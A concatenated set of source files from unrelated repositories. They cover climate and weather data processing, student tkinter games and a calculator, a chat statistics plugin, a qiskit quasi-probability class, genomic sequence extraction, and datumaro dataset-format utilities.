var = atm.expand_dims(ds[nm], 'year', year)
ds_rel[nm] = utils.daily_rel2onset(var, d0, npre, npost)
ds_rel.attrs['d_onset'] = d_onset
ds_rel.attrs['d_retreat'] = d_retreat
savefile = savefiles[plev][y]
print('Saving to ' + savefile)
ds_rel.to_netcdf(savefile)
# ----------------------------------------------------------------------
# Compute climatologies and save
yearstr = '%d-%d' % (years.min(), years.max())
for plev in plevs:
relfiles = savefiles[plev]
savefile = savestr % plev + '_' + yearstr + '.nc'
ds = atm.mean_over_files(relfiles)
ds.attrs['years'] = years
print('Saving to ' + savefile)
ds.to_netcdf(savefile)
# ----------------------------------------------------------------------
# Concatenate plevels in climatology and save
files = [savestr % plev + '_' + yearstr + '.nc' for plev in plevs]
ubudget = xray.Dataset()
pname, pdim = 'Height', 1
subset_dict = {'lat' : (-60, 60), 'lon' : (40, 120)}
for i, plev in enumerate(plevs):
filenm = files[i]
print('Loading ' + filenm)
with xray.open_dataset(filenm) as ds:
ds = atm.subset(ds, subset_dict)
ds.load()
for nm in ds.data_vars:
ds[nm] = atm.expand_dims(ds[nm], pname, plev, axis=pdim)
if i == 0:
ubudget = ds
else:
ubudget = xray.concat([ubudget, ds], dim=pname)
ubudget.coords[pname].attrs['units'] = 'hPa'
savefile = files[0]
savefile = savefile.replace('%d' % plevs[0], '')
print('Saving to ' + savefile)
ubudget.to_netcdf(savefile)
```
|
{
"source": "jenfly/pyladies-pandas",
"score": 4
}
|
#### File: wrangling/environment-canada/ecweather.py
```python
import numpy as np
import pandas as pd
import requests
def download_hourly_raw(env_canada_id, year, month, savefile='test.csv', verbose=True):
"""Download csv file of hourly data for selected station, year, and month"""
# URL endpoint and query parameters
url_endpoint = 'http://climate.weather.gc.ca/climate_data/bulk_data_e.html'
params = {'format' : 'csv',
'stationID' : env_canada_id,
'Year' : year,
'Month' : f'{month:02d}',
'Day' : '01',
'timeframe' : '1',
'submit' : ' Download Data'}
# Send GET request
response = requests.get(url_endpoint, params=params)
# Download csv file
if verbose:
print(f'Saving to {savefile}')
with open(savefile, 'wb') as f:
f.write(response.content)
return None
def read_hourly_raw(csv_file, pre_process=True, skiprows=15):
"""Read hourly weather data from CSV file, and return as a DataFrame.
If argument `pre_process` is True, some minor pre-processing is applied
to the DataFrame: adjust some column labels, and include only the columns
we're interested in.
"""
df = pd.read_csv(csv_file, skiprows=skiprows, index_col=0, parse_dates=True)
if pre_process:
# Remove redundant time columns and any columns with label ending in "Flag"
time_cols = ['Year', 'Month', 'Day' , 'Time']
flag_cols = [col for col in df.columns if col.endswith('Flag')]
df = df.drop(time_cols + flag_cols, axis=1)
# Remove non-ascii degree symbol from column labels
# and rename 'Weather' to 'Conditions'
def adjust_label(label):
return label.replace('\xb0', 'deg ').replace('Weather', 'Conditions')
columns = [adjust_label(col) for col in df.columns]
df.columns = columns
# Rename datetime index
df.index.name = 'Datetime (Local Standard)'
return df
def load_hourly_data(csv_files, pre_process=True, skiprows=15, verbose=True):
"""Read raw hourly data from list of csv files, merge, and return as a DataFrame
If argument `pre_process` is True, some minor pre-processing is applied
to the DataFrame: adjust some column labels, and include only the columns
we're interested in.
"""
df_list = []
for csv_file in csv_files:
if verbose:
print(f'Reading {csv_file}')
df_in = read_hourly_raw(csv_file, pre_process=pre_process, skiprows=skiprows)
df_list.append(df_in)
data = pd.concat(df_list, axis=0)
return data
def process_hourly_data(data, station, stations_info, verbose=True):
"""Process hourly weather data and station metadata, and return as a DataFrame"""
# Check for any rows where all measurements are missing
all_missing = data.isnull().all(axis=1)
if verbose:
print(f'{all_missing.value_counts().get(True)} rows with all measurements missing')
# Assume weather category persists until indicated otherwise by a new non-null value
# so use forward filling, except if all other measurements are missing, then leave as null
data_out = data.copy()
data_out['Conditions'] = data_out['Conditions'].fillna(method='ffill')
data_out.loc[all_missing, 'Conditions'] = np.nan
# Convert wind direction from 10s of degrees to degrees
data_out['Wind Dir (deg)'] = 10 * data_out['Wind Dir (10s deg)']
# Add station metadata
data_out['Station ID'] = station
data_out['Station Name'] = stations_info.loc[station, 'Name']
data_out['Timezone'] = stations_info.loc[station, 'Timezone']
# Calculate UTC datetimes
utc_offset_hours = stations_info.loc[station, 'UTC Offset (hours)']
tdelta = pd.Timedelta(-utc_offset_hours, unit='h')
data_out['Datetime (UTC)'] = data_out.index + tdelta
# Reorder columns
columns = ['Station ID', 'Station Name', 'Timezone', 'Datetime (UTC)',
'Temp (deg C)', 'Dew Point Temp (deg C)', 'Rel Hum (%)',
'Wind Dir (deg)', 'Wind Spd (km/h)', 'Visibility (km)',
'Stn Press (kPa)', 'Hmdx', 'Wind Chill', 'Conditions']
data_out = data_out[columns]
return data_out
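# A commented sketch of the intended pipeline (the file names and station ID
# below are hypothetical; `stations_info` is assumed to be a DataFrame indexed
# by station ID with 'Name', 'Timezone' and 'UTC Offset (hours)' columns, as
# referenced in process_hourly_data above):
#
# csv_files = ['station-2020-01.csv', 'station-2020-02.csv']
# raw = load_hourly_data(csv_files)
# hourly = process_hourly_data(raw, 'some-station-id', stations_info)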
```
|
{
"source": "JenFuChen/NKUST",
"score": 4
}
|
#### File: Python/110-1/1222.py
```python
def addCustomer():
check = 0
ID = data[1]
for i in range(len(customerData)-1, -1, -1):
if(ID == customerData[i][0]):
print("Exist")
check = 1
if(check == 0):
customerData.append(data[1:5])
def deleteCustomer():
check = 0
ID = data[1]
for i in range(len(customerData)-1, -1, -1):
if(ID == customerData[i][0]):
del customerData[i]
check = 1
if(check == 0):
print("None")
def arrangeData():
check = 0
ID = data[1]
option = int(data[2])
index = data[3]
for i in range(len(customerData)-1, -1, -1):
if(ID == customerData[i][0]):
            if(option == 0): # name
customerData[i][1] = index
if(option == 1): # phone.
customerData[i][2] = index
if(option == 2): # birth
customerData[i][3] = index
check = 1
if(check == 0):
print("None")
def searchCustomer():
check = 0
ID = data[1]
option = int(data[2])
for i in range(len(customerData)-1, -1, -1):
if(ID == customerData[i][0]):
            if(option == 0): # name
print(customerData[i][1])
if(option == 1): # phone.
print(customerData[i][2])
if(option == 2): # birth
print(customerData[i][3])
check = 1
if(check == 0):
print("None")
customerData = []
while(1):
data = input()
data = data.split()
order = data[0]
if(order == '*'):
break
if (order == '@'):
addCustomer()
if(order == "#"):
deleteCustomer()
if(order == "!"):
arrangeData()
if(order == '$'):
searchCustomer()
# 2 Roger 0912345678 550101 測資
```
#### File: Python/110-2/0309.py
```python
from tkinter import *
import tkinter
from tkmacosx import Button
root = Tk()
root.title("Caculator")
Button_1 = Button()
contentVar = tkinter.StringVar(root, '')
buttonList = [
['C', '//', '*', '-'],
['7', '8', '9', '+'],
['4', '5', '6'],
['1', '2', '3', '='],
['0', '.']]
def caculateFunc(inputStr):
operation = ('+', '-', '*', '//')
content = contentVar.get()
print("get = ", inputStr, "\n")
if(inputStr in '0123456789.'):
content += inputStr
elif(inputStr in operation):
content += inputStr
elif(inputStr == 'C'):
content = ''
elif(inputStr == '='):
content = str(eval(content))
contentVar.set(content)
# Button used as the display for the current expression
displayButton = Button(root, fg='white', bg='#3E4149', textvariable=contentVar,
width=200, height=50)
displayButton.grid(row=0, column=0, columnspan=4)
displayButton["font"] = ("arial", 20, "bold")
for i in range(5):
for j in range(len(buttonList[i])):
col = j
get_str = buttonList[i][j]
if((i == 1 and j == 3) or (i == 3 and j == 3)): # + =
rowpan = 2
colpan = 1
height = 100
width = 50
elif((i == 4 and j == 0)): # 0
colpan = 2
rowpan = 1
width = 100
height = 50
elif((i == 4 and j == 1)): # ..
col = j+1
colpan = 1
rowpan = 1
width = 50
height = 50
else:
colpan = 1
rowpan = 1
width = 50
height = 50
Button_1 = Button(root, text=buttonList[i][j], bg='#F4AA40', fg='black',
width=width, height=height,
command=lambda x=get_str: caculateFunc(x))
Button_1.grid(row=i+1, column=col, rowspan=rowpan, columnspan=colpan)
Button_1["font"] = ("arial", 12, "bold")
root.mainloop()
```
#### File: Python/110-2/0330_1.py
```python
from tkinter import *
import tkinter
from click import command
import random
from tkmacosx import Button
root = Tk()
root.title("配對遊戲")
contentVar = tkinter.StringVar(root, '剩餘次數'+str(50))
displayButton = Button(root, fg='white', bg='#3E4149', textvariable=contentVar,
width=500, height=50, borderless=1)
displayButton.grid(row=11, column=0, columnspan=10)
reset = Button(root, fg='white', bg='#CD4B1D', text='Reset',
width=500, height=50, borderless=1, command=lambda: reset_btn())
reset.grid(row=12, column=0, columnspan=10)
buttonList = []
empty = []
def reset_btn():
global buttonList, empty, token, token2, token1, counter, first, second
buttonList = []
empty = []
layout()
random_Num()
token = 0
token1 = -1
token2 = -1
counter = 50
first = 0
second = 0
contentVar.set('剩餘次數:'+str(counter))
def layout():
height = 50
width = 50
for i in range(100):
row = int(i/10)
col = i % 10
buttonList.append(StringVar())
empty.append(Button(root, textvariable=buttonList[i], borderless=1,
width=width, height=height, command=lambda n=i: click(n)))
empty[i].grid(row=row+1, column=col)
layout()
temp = []
index = []
# make random list
def random_Num():
global index, temp
temp = []
index = []
for i in range(10):
for j in range(10):
temp.append(i)
for i in range(100):
n = temp.pop(random.randint(0, (len(temp)-1)))
buttonList[i].set(n)
index.append(n)
random_Num()
token = 0
token1 = -1
token2 = -1
counter = 50
first = 0
second = 0
def click(n):
print("Clicked-----")
global token1, token2, token, counter, first, second
print(index[n])
if(token == 0):
token1 = index[n]
first = n
token = 1
print("Token1 = ", token1, "\tPlace = ", first)
elif(token == 1):
token2 = index[n]
second = n
token = 2
print("Token2 = ", token2, "\tPlace = ", second)
if(token1 == token2 and first != second):
buttonList[first].set('')
buttonList[second].set('')
empty[first].config(state="disabled")
empty[second].config(state="disabled")
token = 0
first = 0
second = 0
counter -= 1
token1 = -1
token2 = -1
elif((token1 != token2 and token == 2) or first == second):
empty[first].config(state="normal")
empty[second].config(state="normal")
token = 0
token1 = -1
token2 = -1
first = 0
second = 0
contentVar.set("剩餘次數:"+str(counter))
if(counter == 0):
contentVar.set("恭喜完成!")
reset_btn()
root.mainloop()
```
#### File: 110-2/0504/0504.py
```python
from tkinter import *
import tkinter
import random
import time
from threading import Timer
from tkmacosx import Button
import os
print('-------')
cwd = os.getcwd()
print(cwd)
print('------')
root = Tk()
root.title("麻阿台")
contentVar = tkinter.StringVar(root, 'GO')
displayButton = Button(root, fg='white', bg='#3E4149', textvariable=contentVar,
width=100, height=50, command=lambda: click())
displayButton.grid(row=3, column=3, columnspan=2)
displayButton = Button(root, fg='white', bg='#EA5532', text='Reset',
width=100, height=50, command=lambda: stop())
displayButton.grid(row=4, column=3, columnspan=2)
buttonList = []
empty = []
temp = []
width = 50
height = 50
cnt = 0
pictureList = [r"./For0504/apple.png",
"./For0504/betelnut.png",
"./For0504/double7.png",
"./For0504/grape.png",
"./For0504/orange.png",
"./For0504/ring.png",
"./For0504/star.png",
"./For0504/watermelon.png"]
# indices of the outer frame (border) cells
squarelist = [0, 1, 2, 3, 4, 5, 6, 7,
15, 23, 31, 39, 47, 55,
63, 62, 61, 60, 59, 58, 57, 56,
48, 40, 32, 24, 16, 8]
speed = [0.1, 0.3, 0.5, 0.7, 0.9]
def click():
global time1, cnt
print("Click\t----------")
time1.start()
for i in squarelist:
cnt = i
def stop():
time1.cancel()
print("Stop\t----------")
runtimes = 0
before = 0
after = 0
def run():
global time1, runtimes, before, after, s, cnt
time1.cancel()
runtimes += 1
if(runtimes > 35):
stop()
runtimes = 0
else:
before = after
if(cnt >= len(squarelist)-1):
cnt = 0
else:
cnt += 1
after = cnt
empty[squarelist[before]].configure(bg='#FFFFFF')
empty[squarelist[after]].configure(bg='#EA5532')
        # control the speed
if(runtimes > 30):
s = 4
elif(runtimes > 24):
s = 3
elif(runtimes > 18):
s = 2
elif(runtimes > 10):
s = 1
elif(runtimes > 0):
s = 0
time1 = Timer(speed[s], run)
time1.start()
print("before = ", before, "after = ", after)
time1 = Timer(speed[0], run)
def reset_btn():
print("Reset\t----------")
global buttonList, empty
buttonList = []
empty = []
randomPic()
layout()
def randomPic():
for i in range(64):
num = random.randint(0, 7)
buttonList.append(PhotoImage(file=pictureList[num]))
def layout():
print("Create\t----------")
global temp, width, height, cnt
for i in range(64):
row = int(i/8)
col = i % 8
if(row == 0 or row == 7 or col == 0 or col == 7):
empty.append(
Button(root, image=buttonList[i], width=width, height=height))
else:
empty.append(Label(root))
if(row == 3 and (col == 3 or col == 4)):
empty[i].configure(bg='#3E4149')
if(row == 4 and (col == 3 or col == 4)):
empty[i].configure(bg='#EA5532')
empty[i].grid(row=row, column=col)
reset_btn()
root.mainloop()
```
#### File: 110-2/Midterm Exam/002.py
```python
from tkinter import *
import tkinter
from tkmacosx import Button
root = Tk()
root.title("按鈕位置") # 視窗標題
row = 5
Button_1 = Button()
contentVar = tkinter.StringVar(root, '')
buttonList = list()
def show(n, m):
contentVar.set('Row = ' + str(n) + ' Column = ' + str(m))
displayButton = Button(root, fg='white', bg='#3E4149', textvariable=contentVar,
width=250, height=50)
displayButton.grid(row=6, column=0, columnspan=5)
def layout(n):
height = 50
width = 50
for i in range(n*n):
row = int(i/n)
col = i % n
buttonList.append(StringVar())
Index = Button(root, textvariable=buttonList[i],
width=width, height=height,
command=lambda x=row, y=col: show(x, y))
Index.grid(row=row+1, column=col)
layout(5)
root.mainloop()
```
#### File: 110-2/Midterm Exam 2/002.py
```python
from tkinter import *
import tkinter
from random import randint
root = Tk()
root.title("剪刀石頭布")
Button_1 = Button()
contentVar = tkinter.StringVar(root, '')
buttonList = list()
displayButton = Button(root, fg='white', bg='#3E4149', textvariable=contentVar,
width=30, height=2)
displayButton.grid(row=0, column=0, columnspan=3)
displayButton["font"] = ("arial", 20, "bold")
buttonList = ['Y','O','W']
computerWin = 0
userWin = 0
tie = 0
def click(user):
global computerWin, userWin, tie
computer = buttonList[randint(0,2)]
if(computer == 'O'):
if(user == 'Y'):
computerWin += 1
elif(user == 'O'):
tie +=1
elif(user == 'W'):
userWin += 1
if(computer == 'W'):
if(user == 'O'):
computerWin += 1
elif(user == 'W'):
tie +=1
elif(user == 'Y'):
userWin += 1
if(computer == 'Y'):
if(user == 'W'):
computerWin += 1
elif(user == 'Y'):
tie +=1
elif(user == 'O'):
userWin += 1
contentVar.set('You:' + user + ', Computer:' + computer +'\nYou Win:' + str(userWin))
for i in range(3):
col = i
get_str = buttonList[i]
width = 7
height = 3
Button_1 = Button(root, text=buttonList[i], bg='#3E4149', fg='white',
width=width, height=height,
command=lambda x=get_str: click(x))
Button_1.grid(row=1,column=col)
Button_1["font"] = ("arial", 12, "bold")
root.mainloop()
```
|
{
"source": "Jengas/sketal",
"score": 2
}
|
#### File: plugins/content/content_statistics.py
```python
from handler.base_plugin import CommandPlugin
from utils import parse_user_name
import time
class StatisticsPlugin(CommandPlugin):
__slots__ = ()
def __init__(self, *commands, prefixes=None, strict=False):
"""Stores amount of messages for users in chats. Requires: StoragePlugin."""
if not commands:
commands = ("статистика",)
super().__init__(*commands, prefixes=prefixes, strict=strict)
async def global_before_message_checks(self, msg):
data = msg.meta["data_chat"]
if not data:
return
if "chat_statistics" not in data:
data["chat_statistics"] = {"users": {}}
statistics = data["chat_statistics"]
if msg.user_id not in statistics["users"]:
statistics["users"][msg.user_id] = {"messages": 0, "symbols": 0,
"last_message": time.time()}
user = statistics["users"][msg.user_id]
user["messages"] += 1
user["symbols"] += len(msg.full_text)
user["last_message"] = time.time()
async def process_message(self, msg):
if not msg.meta["data_chat"]:
return await msg.answer("✋ Статистика в личных сообщениях не учитывается.")
statistics = sorted(
msg.meta["data_chat"]["chat_statistics"]["users"].items(),
key=lambda item: (-item[1]["messages"], -item[1]["last_message"])
)[:10]
result = "👀 Немного статистики:\n"
for i, pack in enumerate(statistics):
uid, u = pack
if uid == self.api.get_current_id():
isbot = "(👾 бот) "
else:
isbot = ""
result += f"{i + 1}. {isbot}" + await parse_user_name(uid, msg) + \
f" (сообщений: {u['messages']}, символов: {u['symbols']}).\n"
await msg.answer(result)
```
|
{
"source": "jenglick/qiskit-runtime",
"score": 3
}
|
#### File: qiskit_runtime/circuit_runner/quasi.py
```python
from math import sqrt
from .probability import ProbDistribution
class QuasiDistribution(dict):
"""A dict-like class for representing qasi-probabilities.
"""
def __init__(self, data, shots=None):
"""Builds a quasiprobability distribution object.
Parameters:
data (dict): Input quasiprobability data.
shots (int): Number of shots the distribution was derived from.
"""
self.shots = shots
super().__init__(data)
def nearest_probability_distribution(self, return_distance=False):
"""Takes a quasiprobability distribution and maps
it to the closest probability distribution as defined by
the L2-norm.
Parameters:
return_distance (bool): Return the L2 distance between distributions.
Returns:
ProbDistribution: Nearest probability distribution.
float: Euclidean (L2) distance of distributions.
Notes:
Method from Smolin et al., Phys. Rev. Lett. 108, 070502 (2012).
"""
sorted_probs = dict(sorted(self.items(), key=lambda item: item[1]))
num_elems = len(sorted_probs)
new_probs = {}
beta = 0
diff = 0
for key, val in sorted_probs.items():
temp = val+beta/num_elems
if temp < 0:
beta += val
num_elems -= 1
diff += val*val
else:
diff += (beta/num_elems)*(beta/num_elems)
new_probs[key] = sorted_probs[key] + beta/num_elems
if return_distance:
return ProbDistribution(new_probs, self.shots), sqrt(diff)
return ProbDistribution(new_probs, self.shots)
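# A small commented usage sketch (the distribution values are made up):
#
# quasi = QuasiDistribution({'00': 0.98, '01': 0.05, '11': -0.03}, shots=1024)
# nearest, dist = quasi.nearest_probability_distribution(return_distance=True)
# # `nearest` drops the negative entry and shifts the remaining probabilities
# # so they stay normalized; `dist` is the L2 distance to the original.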
```
|
{
"source": "jenhantao/abtba",
"score": 3
}
|
#### File: abtba/model_training/extract_sequences.py
```python
import sys
import os
import inspect
def read_bed_file(input_path):
'''
reads a bed file and returns the genomic coordinates
'''
with open(input_path) as f:
data = f.readlines()
coordinates = []
if data[0].strip()[0] == '#':
data = data[1:]
for line in data:
tokens = line.strip().split()
chrom = tokens[0]
start = tokens[1]
end = tokens[2]
coordinates.append((chrom,start, end))
return coordinates
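# For reference, read_bed_file() expects plain whitespace-separated BED lines
# (an optional leading '#' header line is skipped), e.g.:
# chr1  3000000  3000200
# chr2  4500000  4500200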
def extract_sequence(coordinates, genome, out_file_path):
'''
Given a list of genomic coordinates, extracts sequences
inputs: [(chrom1, start1, end1), ..., (chromN, startN, endN)]
outputs: [seq1, seq2, ...seqN]
'''
script_path = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
genome_path = script_path + '/' + genome + '/'
chromosomes = [x.split('.')[0] for x in os.listdir(genome_path)]
    chromosomes = [chrom for chrom in chromosomes if 'chrUn' not in chrom and 'random' not in chrom and 'alt' not in chrom]
chrom_size_dict = {}
chrom_seq_dict = {}
print('reading genome', genome)
for chrom in chromosomes:
with open(genome_path + chrom + '.fa') as f:
data = f.readlines()
seq = ''.join(x.upper().strip() for x in data[1:])
size = len(seq)
chrom_size_dict[chrom] = size
chrom_seq_dict[chrom] = seq
out_file = open(out_file_path, 'w')
for coord in coordinates:
chrom = coord[0]
# chrom_seq dict is 0 indexed, genome coords are 1 indexed
start = int(coord[1]) - 1
end = int(coord[2]) - 1
if chrom in chrom_seq_dict:
seq = chrom_seq_dict[chrom][start:end]
if len(seq)>0:
id_line = '>' + str(coord[0]) + ':' +str(coord[1]) + '-' + str(coord[2]) + '\n'
out_file.write(id_line)
out_file.write(seq + '\n')
else:
print(chrom, start, end, 'not found')
out_file.close()
if __name__ == '__main__':
if len(sys.argv) < 4:
print('Usage')
print('extract_sequences.py <bed file> <genome> <output_file_path>')
sys.exit(0)
else:
bed_path = sys.argv[1]
genome = sys.argv[2]
output_path = sys.argv[3]
coordinates = read_bed_file(bed_path)
extract_sequence(coordinates, genome, output_path)
```
|
{
"source": "jenhaoyang/datumaro",
"score": 2
}
|
#### File: cli/util/project.py
```python
from typing import Optional, Tuple
import os
import re
from datumaro.cli.util.errors import WrongRevpathError
from datumaro.components.dataset import Dataset
from datumaro.components.environment import Environment
from datumaro.components.errors import DatumaroError, ProjectNotFoundError
from datumaro.components.project import Project, Revision
from datumaro.util.os_util import generate_next_name
from datumaro.util.scope import on_error_do, scoped
def load_project(project_dir, readonly=False):
return Project(project_dir, readonly=readonly)
def generate_next_file_name(basename, basedir='.', sep='.', ext=''):
"""
If basedir does not contain basename, returns basename,
otherwise generates a name by appending sep to the basename
and the number, next to the last used number in the basedir for
files with basename prefix. Optionally, appends ext.
"""
return generate_next_name(os.listdir(basedir), basename, sep, ext)
def parse_dataset_pathspec(s: str,
env: Optional[Environment] = None) -> Dataset:
"""
Parses Dataset paths. The syntax is:
- <dataset path>[ :<format> ]
Returns: a dataset from the parsed path
"""
match = re.fullmatch(r"""
(?P<dataset_path>(?: [^:] | :[/\\] )+)
(:(?P<format>.+))?
""", s, flags=re.VERBOSE)
if not match:
raise ValueError("Failed to recognize dataset pathspec in '%s'" % s)
match = match.groupdict()
path = match["dataset_path"]
format = match["format"]
return Dataset.import_from(path, format, env=env)
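# For example (the path and format name here are only illustrative):
# dataset = parse_dataset_pathspec('path/to/dataset:coco')
# # loads the dataset at 'path/to/dataset' using the 'coco' format plugin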
@scoped
def parse_revspec(s: str, ctx_project: Optional[Project] = None) \
-> Tuple[Dataset, Project]:
"""
Parses Revision paths. The syntax is:
- <project path> [ @<rev> ] [ :<target> ]
- <rev> [ :<target> ]
- <target>
The second and the third forms assume an existing "current" project.
Returns: the dataset and the project from the parsed path.
The project is only returned when specified in the revpath.
"""
match = re.fullmatch(r"""
(?P<proj_path>(?: [^@:] | :[/\\] )+)
(@(?P<rev>[^:]+))?
(:(?P<source>.+))?
""", s, flags=re.VERBOSE)
if not match:
raise ValueError("Failed to recognize revspec in '%s'" % s)
match = match.groupdict()
proj_path = match["proj_path"]
rev = match["rev"]
source = match["source"]
target_project = None
assert proj_path
if rev:
target_project = load_project(proj_path, readonly=True)
project = target_project
# proj_path is either proj_path or rev or source name
elif Project.find_project_dir(proj_path):
target_project = load_project(proj_path, readonly=True)
project = target_project
elif ctx_project:
project = ctx_project
if project.is_ref(proj_path):
rev = proj_path
elif not source:
source = proj_path
else:
raise ProjectNotFoundError("Failed to find project at '%s'. " \
"Specify project path with '-p/--project' or in the "
"target pathspec." % proj_path)
if target_project:
on_error_do(Project.close, target_project, ignore_errors=True)
tree = project.get_rev(rev)
return tree.make_dataset(source), target_project
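# An illustrative call (project path, revision and source name are made up):
# dataset, project = parse_revspec('myproject/@HEAD:source-1')
# # -> the 'source-1' dataset at revision HEAD of the project in 'myproject/'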
def parse_full_revpath(s: str, ctx_project: Optional[Project] = None) \
-> Tuple[Dataset, Optional[Project]]:
"""
revpath - either a Dataset path or a Revision path.
Returns: the dataset and the project from the parsed path
The project is only returned when specified in the revpath.
"""
if ctx_project:
env = ctx_project.env
else:
env = Environment()
errors = []
try:
return parse_dataset_pathspec(s, env=env), None
except (DatumaroError, OSError) as e:
errors.append(e)
try:
return parse_revspec(s, ctx_project=ctx_project)
except (DatumaroError, OSError) as e:
errors.append(e)
raise WrongRevpathError(problems=errors)
def split_local_revpath(revpath: str) -> Tuple[Revision, str]:
"""
Splits the given string into revpath components.
A local revpath is a path to a revision withing the current project.
The syntax is:
- [ <revision> : ] [ <target> ]
At least one part must be present.
Returns: (revision, build target)
"""
sep_pos = revpath.find(':')
if -1 < sep_pos:
rev = revpath[:sep_pos]
target = revpath[sep_pos + 1:]
else:
rev = ''
target = revpath
return rev, target
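# A couple of concrete illustrations of the split above:
#   split_local_revpath('HEAD:source-1') -> ('HEAD', 'source-1')
#   split_local_revpath('source-1')      -> ('', 'source-1')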
```
#### File: datumaro/components/format_detection.py
```python
from enum import IntEnum
from typing import (
Callable, Collection, Iterator, List, Optional, Sequence, TextIO, Union,
)
import contextlib
import fnmatch
import glob
import os.path as osp
from typing_extensions import NoReturn
class FormatDetectionConfidence(IntEnum):
"""
Represents the level of confidence that a detector has in a dataset
belonging to the detector's format.
"""
LOW = 10
"""
The dataset seems to belong to the format, but the format is too loosely
defined to be able to distinguish it from other formats.
"""
MEDIUM = 20
"""
The dataset seems to belong to the format, and is likely not to belong
to any other format.
"""
# There's no HIGH confidence yet, because none of the detectors
# deserve it. It's reserved for when the detector is sure that
# the dataset belongs to the format; for example, because the format
# has explicit identification via magic numbers/files.
# All confidence levels should be positive for a couple of reasons:
# * It makes it possible to use 0 or a negative number as a special
# value that is guaranteed to be less than any real value.
# * It makes sure that every confidence level is a true value.
assert all(level > 0 for level in FormatDetectionConfidence)
class FormatRequirementsUnmet(Exception):
"""
Represents a situation where a dataset does not meet the requirements
of a given dataset format.
More specifically, if this exception is raised, then it is necessary
(but may not be sufficient) for the dataset to meet at least
one of these requirements to be detected as being in that format.
Each element of `failed_alternatives` must be a human-readable
statement describing a requirement that was not met.
Must not be constructed or raised directly; use `FormatDetectionContext`
methods.
"""
def __init__(self, failed_alternatives: Sequence[str]) -> None:
assert failed_alternatives
self.failed_alternatives = tuple(failed_alternatives)
class FormatDetectionContext:
"""
An instance of this class is given to a dataset format detector.
See the `FormatDetector` documentation. The class should not
be instantiated directly.
A context encapsulates information about the dataset whose format
is being detected. It also offers methods that place requirements
on that dataset. Each such method raises a `FormatRequirementsUnmet`
exception if the requirement is not met. If the requirement _is_
met, the return value depends on the method.
"""
class _OneOrMoreContext:
failed_alternatives: List[str]
had_successful_alternatives: bool
def __init__(self) -> None:
self.failed_alternatives = []
self.had_successful_alternatives = False
# This points to a `_OneOrMoreContext` when and only when the detector
# is directly within a `require_any` block.
_one_or_more_context: Optional[_OneOrMoreContext]
def __init__(self, root_path: str) -> None:
self._root_path = root_path
self._one_or_more_context = None
@property
def root_path(self) -> str:
"""
Returns the path to the root directory of the dataset.
Detectors should avoid using this property in favor of specific
requirement methods.
"""
return self._root_path
def _is_path_within_root(self, path: str) -> bool:
"""
Checks that `path` is a relative path and does not attempt to leave
the dataset root by using `..` segments.
Requirement-placing methods that use this to verify their arguments
should raise a FormatRequirementsUnmet rather than a "hard" error like
AssertionError if False is returned. The reason is that the path passed
by the detector might not have been hardcoded, and instead might have
been acquired from another file in the dataset. In that case, an invalid
pattern signifies a problem with the dataset, not with the detector.
"""
if osp.isabs(path) or osp.splitdrive(path)[0]:
return False
path = osp.normpath(path)
if path.startswith('..' + osp.sep):
return False
return True
def _start_requirement(self, req_type: str) -> None:
assert not self._one_or_more_context, \
f"a requirement ({req_type}) can't be placed directly within " \
"a 'require_any' block"
def fail(self, requirement_desc: str) -> NoReturn:
"""
Places a requirement that is never met. `requirement_desc` must contain
a human-readable description of the requirement.
"""
self._start_requirement("fail")
raise FormatRequirementsUnmet((requirement_desc,))
def require_file(self, pattern: str, *,
exclude_fnames: Union[str, Collection[str]] = (),
) -> str:
"""
Places the requirement that the dataset contains at least one file whose
relative path matches the given pattern. The pattern must be a glob-like
pattern; `**` can be used to indicate a sequence of zero or more
subdirectories.
If the pattern does not describe a relative path, or refers to files
outside the dataset root, the requirement is considered unmet.
If the requirement is met, the relative path to one of the files that
match the pattern is returned. If there are multiple such files, it's
unspecified which one of them is returned.
`exclude_fnames` must be a collection of patterns or a single pattern.
If at least one pattern is supplied, then the placed requirement is
narrowed to only accept files with names that match none of these
patterns.
"""
self._start_requirement("require_file")
if isinstance(exclude_fnames, str):
exclude_fnames = (exclude_fnames,)
requirement_desc = \
f"dataset must contain a file matching pattern \"{pattern}\""
if exclude_fnames:
requirement_desc += ' (but not named ' + \
', '.join(f'"{e}"' for e in exclude_fnames) + ')'
if not self._is_path_within_root(pattern):
self.fail(requirement_desc)
pattern_abs = osp.join(glob.escape(self._root_path), pattern)
for path in glob.iglob(pattern_abs, recursive=True):
if osp.isfile(path):
# Ideally, we should provide a way to filter out whole paths,
# not just file names. However, there is no easy way to match an
# entire path with a pattern (fnmatch is unsuitable, because
# it lets '*' match a slash, which can lead to spurious matches
# and is not how glob works).
if any(fnmatch.fnmatch(osp.basename(path), pat)
for pat in exclude_fnames):
continue
return osp.relpath(path, self._root_path)
self.fail(requirement_desc)
@contextlib.contextmanager
def probe_text_file(
self, path: str, requirement_desc: str,
) -> Iterator[TextIO]:
"""
Returns a context manager that can be used to place a requirement on
the contents of the file referred to by `path`. To do so, you must
enter and exit this context manager (typically, by using the `with`
statement). On entering, the file is opened for reading in text mode and
the resulting file object is returned. On exiting, the file object is
closed.
The requirement that is placed by doing this is considered met if all
of the following are true:
* `path` is a relative path that refers to a file within the dataset
root.
* The file is opened successfully.
* The context is exited without an exception.
If the context is exited with an exception that was produced by another
requirement being unmet, that exception is reraised and the new
requirement is abandoned.
`requirement_desc` must be a human-readable statement describing the
requirement.
"""
self._start_requirement("probe_text_file")
requirement_desc_full = f"{path}: {requirement_desc}"
if not self._is_path_within_root(path):
self.fail(requirement_desc_full)
try:
with open(osp.join(self._root_path, path), encoding='utf-8') as f:
yield f
except FormatRequirementsUnmet:
raise
except Exception:
self.fail(requirement_desc_full)
@contextlib.contextmanager
def require_any(self) -> Iterator[None]:
"""
Returns a context manager that can be used to place a requirement that
is considered met if at least one of several alternative sets of
requirements is met.
To do so, use a `with` statement, with the alternative sets of
requirements represented as nested `with` statements using the context
manager returned by `alternative`:
with context.require_any():
with context.alternative():
# place requirements from alternative set 1 here
with context.alternative():
# place requirements from alternative set 2 here
...
The contents of all `with context.alternative()` blocks will be
executed, even if an alternative that is met is found early.
Requirements must not be placed directly within a
`with context.require_any()` block.
"""
self._start_requirement("require_any")
self._one_or_more_context = self._OneOrMoreContext()
try:
yield
# If at least one `alternative` block succeeded,
# then the `require_any` block succeeds.
if self._one_or_more_context.had_successful_alternatives:
return
# If no alternatives succeeded, and none failed, then there were
# no alternatives at all.
assert self._one_or_more_context.failed_alternatives, \
"a 'require_any' block must contain " \
"at least one 'alternative' block"
raise FormatRequirementsUnmet(
self._one_or_more_context.failed_alternatives)
finally:
self._one_or_more_context = None
@contextlib.contextmanager
